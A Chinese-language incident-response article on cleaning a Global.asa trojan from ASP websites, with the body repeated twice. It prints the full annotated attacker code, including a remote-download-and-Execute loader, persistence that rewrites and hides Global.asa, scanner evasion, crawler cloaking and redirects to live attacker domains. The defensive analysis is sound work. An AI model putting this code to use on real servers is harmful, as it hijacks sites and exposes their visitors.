网站中Global.asa木马的快速清除方法
2022-06-28 09:19:01
网站中Global.asa木马的快速清除方法。最近多个客户网站的页面被植入了远程加载代码的木马:页面里的一小段 ASP 利用 MSXML2.ServerXMLHTTP 从攻击者服务器下载 VBScript 并用 Execute 执行,第二阶段代码再改写网站根目录的 Global.asa 实现持久化。下面是具体的解决方法。(原文日期:11-03-27)
解决办法:
1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:
2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀 by*aming 或 aming 特征码,如下图所示。注意:该特征码只是木马作者留下的签名,攻击者随时可以改掉,不能作为唯一判据;还应按行为特征排查,例如 MSXML2.ServerXMLHTTP + Execute 的远程加载、ADODB.Stream 改写 Global.asa、以及用拆分字符串拼出 ProgID("adod"&"b.s"&"tream")绕过特征扫描等写法。
3、关闭服务器上的缩略图功能 方法参考 https://www.jb51.net/os/windows/win2003/34960.html
根源:
这次用户中的是下载者类的木马,黑客通过网站的上传漏洞在网站根目录的foot.asp中插入了以下代码(上传漏洞本身也必须修复,否则清理后会再次被植入):
<%
' ANALYST NOTE: this is the injected loader found in foot.asp; it is attacker code,
' not part of the site. It is annotated here for incident response only.
'by*aming
' ^ attacker signature/marker. The second-stage file is tested for this exact string
'   (instr(asa,"by*aming") in xmlasaquan.txt), so it doubles as a quick IOC.
' gethtml(url): fetch a remote URL server-side and return the body as text.
'   - uses MSXML2.ServerXMLHTTP, i.e. the web server itself makes the outbound request
'   - synchronous GET; the User-Agent header is set to the URL itself, an unusual
'     value that is easy to pick out in proxy/egress logs
'   - the raw responsebody is round-tripped through ADODB.Stream to decode it as gb2312
'   Returns: the decoded response text. No error handling: a failed fetch raises.
function gethtml(url)
set objxmlhttp=server.createobject("msxml2.serverxmlhttp")
objxmlhttp.open "get",url,false
objxmlhttp.setrequestheader "user-agent",url
objxmlhttp.send
gethtml=objxmlhttp.responsebody
set objxmlhttp=nothing
' binary (type=1) -> text (type=2) conversion with a fixed gb2312 charset
set objstream = server.createobject("adodb.stream")
objstream.type = 1
objstream.mode =3
objstream.open
objstream.write gethtml
objstream.position = 0
objstream.type = 2
objstream.charset = "gb2312"
gethtml = objstream.readtext
objstream.close
set objstream=nothing
end function
' Stage 2: download xmlasaquan.txt and run it as VBScript with Execute.
' The payload lives on the attacker's server and can change at any time, so what this
' loader does later need not match what is documented on this page.
' Deleting this snippet stops the loader; it does not undo what stage 2 already did
' (notably the overwritten, hidden Global.asa).
execute(gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>
清掉这段代码可以阻断加载器,但并不足以解决问题:第二阶段代码(见下文)会在每次普通访客浏览页面时重新下载 codequan.txt 并改写网站根目录的 Global.asa,并把它设为只读+隐藏+系统属性(attributes=1+2+4),普通 dir 和资源管理器默认看不到。清理时还需要:用 dir /a 或 attrib 检查并清除被改写的 Global.asa;修复导致代码被写入的上传漏洞;在出口防火墙/代理上封堵并审计对 www.pornhome.com、fudu.qpedu.cn、www.82767.com 等域名的访问;排查其他可能被同一漏洞写入的文件。网站木马清理专家查杀结果如下图所示!
xmlasaquan.txt的内容如下:
'<html><head><script>function clear(){source=document.body.firstchild.data;document.open();document.close();document.title="";document.body.innerhtml=source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;url=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,string)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new regexp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
' ANALYST NOTE: the two lines above are VBScript comments when this file is run through
' Execute, so they are inert on the server. Opened raw in a browser they render as an HTML
' page that refreshes to about:blank and whose packed script decodes (dictionary
' 'window|location|replace|about|blank') to window.location.replace('about:blank') --
' presumably so a casual look at the .txt shows a blank page rather than the payload.
'by*aming
' ^ attacker marker; the loader below checks the companion codequan.txt for this string.
' Allow up to 10 minutes so the outbound fetches below do not hit the ASP script timeout.
server.scripttimeout=600
' createasa(content): replace the web root's Global.asa with attacker-supplied text and
' then mark it ReadOnly + Hidden + System. IIS processes Global.asa for the whole
' application, so code planted there runs without being referenced by any page.
' All errors are suppressed (On Error Resume Next), so failures are silent.
public function createasa(byval content)
on error resume next
set fso = server.createobject("scripting.filesystemobject")
' "//./" is the forward-slash spelling of the Win32 device-namespace prefix (\\.\);
' presumably meant to slip past naive path checks -- unconfirmed. If Global.asa does not
' exist yet GetFile fails, but execution continues and SaveToFile creates it below.
set f=fso.getfile("//./" & server.mappath("/global.asa"))
' clear ReadOnly/Hidden/System so the file can be rewritten
f.attributes=0
' ProgID "adodb.stream" assembled from fragments so the literal never appears in the
' source -- a common trick against signature scanners that grep for that string.
set obj = server.createobject("adod" & "b.s" & "tream")
obj.type = 2
obj.open
obj.charset = "gb2312"
' The stream is brand new (nothing was loaded from disk), so Size is 0 and this is a
' no-op: despite looking like an append, the file is REPLACED, not appended to.
obj.position = obj.size
' NOTE(review): WriteText is a method but is written here as an assignment; if that
' Invoke fails the error is swallowed and an empty stream is saved instead -- either way
' Global.asa is overwritten or truncated. Confirm on a lab host before relying on it.
obj.writetext = content
' 2 = adSaveCreateOverWrite
obj.savetofile "//./" & server.mappath("/global.asa"),2
obj.close
set obj = nothing
' 1+2+4 = ReadOnly + Hidden + System: a plain `dir` or Explorer listing will not show
' the file; use `dir /a` or `attrib` when hunting for it.
f.attributes=1+2+4
set f=nothing
set fso = nothing
end function
' gethtml(url): same downloader as in the foot.asp loader -- synchronous server-side GET
' via MSXML2.ServerXMLHTTP with the User-Agent set to the URL itself, body decoded as
' gb2312 through ADODB.Stream. Declared Public here; this copy never releases objstream.
' Returns: decoded response text. No error handling.
public function gethtml(url)
set objxmlhttp=server.createobject("msxml2.serverxmlhttp")
objxmlhttp.open "get",url,false
objxmlhttp.setrequestheader "user-agent",url
objxmlhttp.send
gethtml=objxmlhttp.responsebody
set objxmlhttp=nothing
' binary (type=1) -> text (type=2) conversion
set objstream = server.createobject("adodb.stream")
objstream.type = 1
objstream.mode =3
objstream.open
objstream.write gethtml
objstream.position = 0
objstream.type = 2
objstream.charset = "gb2312"
gethtml = objstream.readtext
objstream.close
end function
' check(user_agent): True if the User-Agent contains any of the listed crawler names.
' InStr is called without a compare argument, so the match is binary (case-sensitive)
' against these lower-case tokens; whether a real crawler matches depends on the exact
' casing of its UA string. Used below to decide who gets the cloaked content.
function check(user_agent)
allow_agent=split("baiduspider,sogou,baidu,sosospider,googlebot,fast-webcrawler,msnbot,slurp",",")
check_agent=false
for agenti=lbound(allow_agent) to ubound(allow_agent)
if instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
next
check=check_agent
end function
' checkrobot(): True if the UA contains "baiduspider" or "googlebot", OR once the
' visitor has requested any page with ?admin=1 (a session flag is set and then honoured
' on later requests). The ?admin=1 switch is presumably how the operator previews the
' crawler-only content. This function is defined but never called in this listing.
function checkrobot()
checkrobot = false
dim botlist,i,repls
repls = request.servervariables("http_user_agent")
krobotlist = "baiduspider|googlebot"
botlist = split(krobotlist,"|")
for i = 0 to ubound(botlist)
if instr(repls,botlist(i)) > 0 then
checkrobot = true
exit for
end if
next
' operator backdoor: ?admin=1 persists a session flag that forces "robot" mode
if request.querystring("admin")= "1" then session("thischeckrobot")=1
if session("thischeckrobot") = 1 then checkrobot = true
end function
' checkrefresh(): True if the first 40 characters of HTTP_REFERER contain one of the
' listed search-engine names, i.e. the visitor arrived from a search result page.
' The length is passed as the string "40" and coerced to a number by Left().
function checkrefresh()
checkrefresh = false
dim botlist,i,repls
krobotlist = "baidu|google|sogou|soso|youdao"
botlist = split(krobotlist,"|")
for i = 0 to ubound(botlist)
if instr(left(request.servervariables("http_referer"),"40"),botlist(i)) > 0 then
checkrefresh = true
exit for
end if
next
end function
' sleep(): misnamed -- it does not pause. If the client is still connected the buffered
' response is flushed; otherwise processing is ended.
sub sleep()
if response.isclientconnected=true then
response.flush
else
response.end
end if
end sub
' ---- main flow: runs on every request to the infected page ----
' 1) Visitors arriving from a search engine are redirected to the attacker's site,
'    with the victim's host name leaked in the query string.
if checkrefresh=true then
cnnbd=lcase(request.servervariables("http_host"))
response.redirect("http://www.82767.com/?"&cnnbd&"")
' Disabled variant: a visible link plus hidden <script> tags pulling from
' count11.51yes.com, js.568tea.com and js.37548.com -- useful IOCs for log review.
'response.write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#ff0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>")
response.end
end if
' 2) Search-engine crawlers are served cloaked content fetched from a third host.
'    strhost is never assigned anywhere in this listing, so domain= is sent empty.
user_agent=request.servervariables("http_user_agent")
if check(user_agent)=true then
body=gethtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strhost&"&ua="&server.urlencode(request.servervariables("http_user_agent"))&"")
response.write body
response.end
else
' 3) Every other visitor triggers the persistence step: fetch codequan.txt and, if it
'    carries the attacker marker, (re)write Global.asa with it. This happens on EVERY
'    ordinary page view, which is why cleaning Global.asa alone does not stick while
'    the foot.asp loader survives. The content of codequan.txt is not shown on this page.
asa=gethtml("http://www.pornhome.com/dy7749/codequan.txt")
if instr(asa,"by*aming")>0 then
createasa(asa)
end if
' Rebuild the requested URL as http://<host><SCRIPT_NAME>[?<query>], lower-cased.
scriptaddress=request.servervariables("script_name")
namepath=server.mappath(scriptaddress)
if len(request.querystring) > 0 then
scriptaddress = scriptaddress & "?" & request.querystring
end if
geturl ="http://"& request.servervariables("http_host") & scriptaddress
geturl =lcase(geturl)
'response.write replace(namepath,server.mappath("/"),"")
'response.end
' The disabled condition below would also have skipped .gov.cn / .edu.cn hosts.
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(lcase(request.servervariables("http_host")),"gov.cn")=0 and instr(lcase(request.servervariables("http_host")),"edu.cn")=0 and
' "Deep link from an external referrer" test. Because geturl always begins with
' "http://<host>/" (SCRIPT_NAME starts with "/"), the second InStr can only be 0 when
' HTTP_HOST contains upper-case letters (geturl was lower-cased, the comparison string
' was not), so in the common case this branch appears not to run at all.
if instr(geturl,"http://"& request.servervariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& request.servervariables("http_host") &"/")=0 and instr(lcase(request.servervariables("http_referer")),lcase(request.servervariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = lcase(request.servervariables("http_referer"))
bot = ""
amll = ""
' crude UA classification; the result is never acted on because the "nobot" branch is empty
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'call writeerr
'response.end
end if
' flush the response (or end it if the client disconnected); see sleep()
call sleep()
end if
end if
'</body></html>
1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:
2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀 by*aming 或 aming 特征码,如下图所示。注意:该特征码只是木马作者留下的签名,攻击者随时可以改掉,不能作为唯一判据;还应按行为特征排查,例如 MSXML2.ServerXMLHTTP + Execute 的远程加载、ADODB.Stream 改写 Global.asa、以及用拆分字符串拼出 ProgID("adod"&"b.s"&"tream")绕过特征扫描等写法。
3、关闭服务器上的缩略图功能 方法参考 https://www.jb51.net/os/windows/win2003/34960.html
根源:
这次用户中的是下载者类的木马,黑客通过网站的上传漏洞在网站根目录的foot.asp中插入了以下代码(上传漏洞本身也必须修复,否则清理后会再次被植入):
代码如下:<%
' ANALYST NOTE: this is the injected loader found in foot.asp; it is attacker code,
' not part of the site. It is annotated here for incident response only.
'by*aming
' ^ attacker signature/marker. The second-stage file is tested for this exact string
'   (instr(asa,"by*aming") in xmlasaquan.txt), so it doubles as a quick IOC.
' gethtml(url): fetch a remote URL server-side and return the body as text.
'   - uses MSXML2.ServerXMLHTTP, i.e. the web server itself makes the outbound request
'   - synchronous GET; the User-Agent header is set to the URL itself, an unusual
'     value that is easy to pick out in proxy/egress logs
'   - the raw responsebody is round-tripped through ADODB.Stream to decode it as gb2312
'   Returns: the decoded response text. No error handling: a failed fetch raises.
function gethtml(url)
set objxmlhttp=server.createobject("msxml2.serverxmlhttp")
objxmlhttp.open "get",url,false
objxmlhttp.setrequestheader "user-agent",url
objxmlhttp.send
gethtml=objxmlhttp.responsebody
set objxmlhttp=nothing
' binary (type=1) -> text (type=2) conversion with a fixed gb2312 charset
set objstream = server.createobject("adodb.stream")
objstream.type = 1
objstream.mode =3
objstream.open
objstream.write gethtml
objstream.position = 0
objstream.type = 2
objstream.charset = "gb2312"
gethtml = objstream.readtext
objstream.close
set objstream=nothing
end function
' Stage 2: download xmlasaquan.txt and run it as VBScript with Execute.
' The payload lives on the attacker's server and can change at any time, so what this
' loader does later need not match what is documented on this page.
' Deleting this snippet stops the loader; it does not undo what stage 2 already did
' (notably the overwritten, hidden Global.asa).
execute(gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>
清掉这段代码可以阻断加载器,但并不足以解决问题:第二阶段代码(见下文)会在每次普通访客浏览页面时重新下载 codequan.txt 并改写网站根目录的 Global.asa,并把它设为只读+隐藏+系统属性(attributes=1+2+4),普通 dir 和资源管理器默认看不到。清理时还需要:用 dir /a 或 attrib 检查并清除被改写的 Global.asa;修复导致代码被写入的上传漏洞;在出口防火墙/代理上封堵并审计对 www.pornhome.com、fudu.qpedu.cn、www.82767.com 等域名的访问;排查其他可能被同一漏洞写入的文件。网站木马清理专家查杀结果如下图所示!
xmlasaquan.txt的内容如下:
代码如下:'<html><head><script>function clear(){source=document.body.firstchild.data;document.open();document.close();document.title="";document.body.innerhtml=source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;url=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,string)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new regexp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
' ANALYST NOTE: the two lines above are VBScript comments when this file is run through
' Execute, so they are inert on the server. Opened raw in a browser they render as an HTML
' page that refreshes to about:blank and whose packed script decodes (dictionary
' 'window|location|replace|about|blank') to window.location.replace('about:blank') --
' presumably so a casual look at the .txt shows a blank page rather than the payload.
'by*aming
' ^ attacker marker; the loader below checks the companion codequan.txt for this string.
' Allow up to 10 minutes so the outbound fetches below do not hit the ASP script timeout.
server.scripttimeout=600
' createasa(content): replace the web root's Global.asa with attacker-supplied text and
' then mark it ReadOnly + Hidden + System. IIS processes Global.asa for the whole
' application, so code planted there runs without being referenced by any page.
' All errors are suppressed (On Error Resume Next), so failures are silent.
public function createasa(byval content)
on error resume next
set fso = server.createobject("scripting.filesystemobject")
' "//./" is the forward-slash spelling of the Win32 device-namespace prefix (\\.\);
' presumably meant to slip past naive path checks -- unconfirmed. If Global.asa does not
' exist yet GetFile fails, but execution continues and SaveToFile creates it below.
set f=fso.getfile("//./" & server.mappath("/global.asa"))
' clear ReadOnly/Hidden/System so the file can be rewritten
f.attributes=0
' ProgID "adodb.stream" assembled from fragments so the literal never appears in the
' source -- a common trick against signature scanners that grep for that string.
set obj = server.createobject("adod" & "b.s" & "tream")
obj.type = 2
obj.open
obj.charset = "gb2312"
' The stream is brand new (nothing was loaded from disk), so Size is 0 and this is a
' no-op: despite looking like an append, the file is REPLACED, not appended to.
obj.position = obj.size
' NOTE(review): WriteText is a method but is written here as an assignment; if that
' Invoke fails the error is swallowed and an empty stream is saved instead -- either way
' Global.asa is overwritten or truncated. Confirm on a lab host before relying on it.
obj.writetext = content
' 2 = adSaveCreateOverWrite
obj.savetofile "//./" & server.mappath("/global.asa"),2
obj.close
set obj = nothing
' 1+2+4 = ReadOnly + Hidden + System: a plain `dir` or Explorer listing will not show
' the file; use `dir /a` or `attrib` when hunting for it.
f.attributes=1+2+4
set f=nothing
set fso = nothing
end function
' gethtml(url): same downloader as in the foot.asp loader -- synchronous server-side GET
' via MSXML2.ServerXMLHTTP with the User-Agent set to the URL itself, body decoded as
' gb2312 through ADODB.Stream. Declared Public here; this copy never releases objstream.
' Returns: decoded response text. No error handling.
public function gethtml(url)
set objxmlhttp=server.createobject("msxml2.serverxmlhttp")
objxmlhttp.open "get",url,false
objxmlhttp.setrequestheader "user-agent",url
objxmlhttp.send
gethtml=objxmlhttp.responsebody
set objxmlhttp=nothing
' binary (type=1) -> text (type=2) conversion
set objstream = server.createobject("adodb.stream")
objstream.type = 1
objstream.mode =3
objstream.open
objstream.write gethtml
objstream.position = 0
objstream.type = 2
objstream.charset = "gb2312"
gethtml = objstream.readtext
objstream.close
end function
' check(user_agent): True if the User-Agent contains any of the listed crawler names.
' InStr is called without a compare argument, so the match is binary (case-sensitive)
' against these lower-case tokens; whether a real crawler matches depends on the exact
' casing of its UA string. Used below to decide who gets the cloaked content.
function check(user_agent)
allow_agent=split("baiduspider,sogou,baidu,sosospider,googlebot,fast-webcrawler,msnbot,slurp",",")
check_agent=false
for agenti=lbound(allow_agent) to ubound(allow_agent)
if instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
next
check=check_agent
end function
' checkrobot(): True if the UA contains "baiduspider" or "googlebot", OR once the
' visitor has requested any page with ?admin=1 (a session flag is set and then honoured
' on later requests). The ?admin=1 switch is presumably how the operator previews the
' crawler-only content. This function is defined but never called in this listing.
function checkrobot()
checkrobot = false
dim botlist,i,repls
repls = request.servervariables("http_user_agent")
krobotlist = "baiduspider|googlebot"
botlist = split(krobotlist,"|")
for i = 0 to ubound(botlist)
if instr(repls,botlist(i)) > 0 then
checkrobot = true
exit for
end if
next
' operator backdoor: ?admin=1 persists a session flag that forces "robot" mode
if request.querystring("admin")= "1" then session("thischeckrobot")=1
if session("thischeckrobot") = 1 then checkrobot = true
end function
' checkrefresh(): True if the first 40 characters of HTTP_REFERER contain one of the
' listed search-engine names, i.e. the visitor arrived from a search result page.
' The length is passed as the string "40" and coerced to a number by Left().
function checkrefresh()
checkrefresh = false
dim botlist,i,repls
krobotlist = "baidu|google|sogou|soso|youdao"
botlist = split(krobotlist,"|")
for i = 0 to ubound(botlist)
if instr(left(request.servervariables("http_referer"),"40"),botlist(i)) > 0 then
checkrefresh = true
exit for
end if
next
end function
' sleep(): misnamed -- it does not pause. If the client is still connected the buffered
' response is flushed; otherwise processing is ended.
sub sleep()
if response.isclientconnected=true then
response.flush
else
response.end
end if
end sub
' ---- main flow: runs on every request to the infected page ----
' 1) Visitors arriving from a search engine are redirected to the attacker's site,
'    with the victim's host name leaked in the query string.
if checkrefresh=true then
cnnbd=lcase(request.servervariables("http_host"))
response.redirect("http://www.82767.com/?"&cnnbd&"")
' Disabled variant: a visible link plus hidden <script> tags pulling from
' count11.51yes.com, js.568tea.com and js.37548.com -- useful IOCs for log review.
'response.write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#ff0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>")
response.end
end if
' 2) Search-engine crawlers are served cloaked content fetched from a third host.
'    strhost is never assigned anywhere in this listing, so domain= is sent empty.
user_agent=request.servervariables("http_user_agent")
if check(user_agent)=true then
body=gethtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strhost&"&ua="&server.urlencode(request.servervariables("http_user_agent"))&"")
response.write body
response.end
else
' 3) Every other visitor triggers the persistence step: fetch codequan.txt and, if it
'    carries the attacker marker, (re)write Global.asa with it. This happens on EVERY
'    ordinary page view, which is why cleaning Global.asa alone does not stick while
'    the foot.asp loader survives. The content of codequan.txt is not shown on this page.
asa=gethtml("http://www.pornhome.com/dy7749/codequan.txt")
if instr(asa,"by*aming")>0 then
createasa(asa)
end if
' Rebuild the requested URL as http://<host><SCRIPT_NAME>[?<query>], lower-cased.
scriptaddress=request.servervariables("script_name")
namepath=server.mappath(scriptaddress)
if len(request.querystring) > 0 then
scriptaddress = scriptaddress & "?" & request.querystring
end if
geturl ="http://"& request.servervariables("http_host") & scriptaddress
geturl =lcase(geturl)
'response.write replace(namepath,server.mappath("/"),"")
'response.end
' The disabled condition below would also have skipped .gov.cn / .edu.cn hosts.
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(lcase(request.servervariables("http_host")),"gov.cn")=0 and instr(lcase(request.servervariables("http_host")),"edu.cn")=0 and
' "Deep link from an external referrer" test. Because geturl always begins with
' "http://<host>/" (SCRIPT_NAME starts with "/"), the second InStr can only be 0 when
' HTTP_HOST contains upper-case letters (geturl was lower-cased, the comparison string
' was not), so in the common case this branch appears not to run at all.
if instr(geturl,"http://"& request.servervariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& request.servervariables("http_host") &"/")=0 and instr(lcase(request.servervariables("http_referer")),lcase(request.servervariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = lcase(request.servervariables("http_referer"))
bot = ""
amll = ""
' crude UA classification; the result is never acted on because the "nobot" branch is empty
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'call writeerr
'response.end
end if
' flush the response (or end it if the client disconnected); see sleep()
call sleep()
end if
end if
'</body></html>